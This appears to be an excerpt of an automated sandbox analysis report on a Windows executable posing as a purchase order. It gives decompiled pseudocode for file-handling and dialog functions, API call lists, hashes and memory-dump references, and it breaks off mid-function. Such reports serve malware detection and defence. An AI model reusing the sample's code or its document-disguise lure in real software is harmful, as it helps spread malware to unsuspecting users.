                      • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                      • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 68%
                      			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                      0x00405760
                      0x0040576d
                      0x00405782
                      0x00405788

                      APIs
                      • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00405760
                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$AttributesCreate
                      • String ID:
                      • API String ID: 415043291-0
                      • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                      • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                      • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                      0x00405741
                      0x0040574a
                      0x00000000
                      0x00405753
                      0x00405759

                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                      • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                      0x004031ac
                      0x004031bf
                      0x004031c7
                      0x00000000
                      0x004031ce
                      0x00000000
                      0x004031d0

                      APIs
                      • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                      • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                      0x004031e8
                      0x004031ee

                      APIs
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

































                      0x00404f6a
                      0x00404f70
                      0x00404f79
                      0x00404f7c
                      0x00405114
                      0x00405138
                      0x00405138
                      0x0040514b
                      0x00405169
                      0x00405170
                      0x004051c7
                      0x004051cb
                      0x00000000
                      0x004051d2
                      0x004051da
                      0x004051e2
                      0x004051e5
                      0x004052de
                      0x00000000
                      0x004052de
                      0x004051f4
                      0x00405200
                      0x00405206
                      0x0040520c
                      0x00405221
                      0x00405227
                      0x0040520e
                      0x00405213
                      0x00405219
                      0x0040521c
                      0x0040521c
                      0x00405237
                      0x0040523f
                      0x00405242
                      0x0040524b
                      0x0040524e
                      0x00405255
                      0x0040525c
                      0x00405264
                      0x00405264
                      0x0040527b
                      0x0040527b
                      0x00405282
                      0x00405288
                      0x00405291
                      0x00405298
                      0x004052a1
                      0x004052a3
                      0x004052a6
                      0x004052b5
                      0x004052b7
                      0x004052bd
                      0x004052be
                      0x004052bf
                      0x004052c7
                      0x004052d2
                      0x004052d8
                      0x004052d8
                      0x00000000
                      0x00405242
                      0x004051cb
                      0x00405178
                      0x004051a8
                      0x004051b0
                      0x004051b2
                      0x004051bb
                      0x004051bb
                      0x004051c2
                      0x00000000
                      0x004051c2
                      0x0040517c
                      0x00405186
                      0x00000000
                      0x0040514d
                      0x00405153
                      0x0040518b
                      0x00000000
                      0x00405194
                      0x0040515c
                      0x00405161
                      0x00405164
                      0x00000000
                      0x00405164
                      0x0040514b
                      0x00404f82
                      0x00404f86
                      0x00404f8f
                      0x00404f96
                      0x00404f99
                      0x00404f9c
                      0x00404f9f
                      0x00404fa0
                      0x00404fa1
                      0x00404fba
                      0x00404fbd
                      0x00404fc7
                      0x00404fd6
                      0x00404fde
                      0x00404fe6
                      0x00404feb
                      0x00404fee
                      0x00404ffa
                      0x00405003
                      0x0040500c
                      0x0040502f
                      0x00405035
                      0x00405046
                      0x0040504b
                      0x00405059
                      0x00405067
                      0x00405067
                      0x0040506c
                      0x0040507a
                      0x0040507a
                      0x0040507f
                      0x00405082
                      0x00405087
                      0x00405093
                      0x0040509c
                      0x004050a9
                      0x004050b8
                      0x004050ab
                      0x004050b0
                      0x004050b0
                      0x004050c4
                      0x004050c4
                      0x004050d8
                      0x004050e1
                      0x004050ea
                      0x004050fa
                      0x00405106
                      0x00405106
                      0x00000000

                      APIs
                      • GetDlgItem.USER32 ref: 00404FC0
                      • GetDlgItem.USER32 ref: 00404FCF
                      • GetClientRect.USER32 ref: 0040500C
                      • GetSystemMetrics.USER32 ref: 00405014
                      • SendMessageA.USER32 ref: 00405035
                      • SendMessageA.USER32 ref: 00405046
                      • SendMessageA.USER32 ref: 00405059
                      • SendMessageA.USER32 ref: 00405067
                      • SendMessageA.USER32 ref: 0040507A
                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                      • ShowWindow.USER32(?,00000008), ref: 004050B0
                      • GetDlgItem.USER32 ref: 004050D1
                      • SendMessageA.USER32 ref: 004050E1
                      • SendMessageA.USER32 ref: 004050FA
                      • SendMessageA.USER32 ref: 00405106
                      • GetDlgItem.USER32 ref: 00404FDE
                        • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                      • GetDlgItem.USER32 ref: 00405123
                      • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                      • CloseHandle.KERNEL32(00000000), ref: 00405138
                      • ShowWindow.USER32(00000000), ref: 0040515C
                      • ShowWindow.USER32(?,00000008), ref: 00405161
                      • ShowWindow.USER32(00000008), ref: 004051A8
                      • SendMessageA.USER32 ref: 004051DA
                      • CreatePopupMenu.USER32 ref: 004051EB
                      • AppendMenuA.USER32 ref: 00405200
                      • GetWindowRect.USER32 ref: 00405213
                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                      • SendMessageA.USER32 ref: 00405272
                      • OpenClipboard.USER32(00000000), ref: 00405282
                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                      • GlobalLock.KERNEL32 ref: 0040529B
                      • SendMessageA.USER32 ref: 004052AF
                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                      • SetClipboardData.USER32(00000001,00000000), ref: 004052D2
                      • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                      • String ID: {
                      • API String ID: 590372296-366298937
                      • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                      • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                      0x00404790
                      0x00404796
                      0x00404798
                      0x0040479e
                      0x004047a4
                      0x004047b1
                      0x004047ba
                      0x004047bd
                      0x004047c0
                      0x004049e8
                      0x004049ef
                      0x00404a03
                      0x004049f1
                      0x004049f3
                      0x004049f6
                      0x004049f7
                      0x004049fe
                      0x004049fe
                      0x00404a0f
                      0x00404a1d
                      0x00404a20
                      0x00404a36
                      0x00404aae
                      0x00404ab1
                      0x00404ab3
                      0x00404abd
                      0x00404acb
                      0x00404acb
                      0x00404acd
                      0x00404ad7
                      0x00404add
                      0x00404afe
                      0x00404adf
                      0x00404aec
                      0x00404aec
                      0x00404add
                      0x00404ad7
                      0x00000000
                      0x00404ab1
                      0x00404a3b
                      0x00404a46
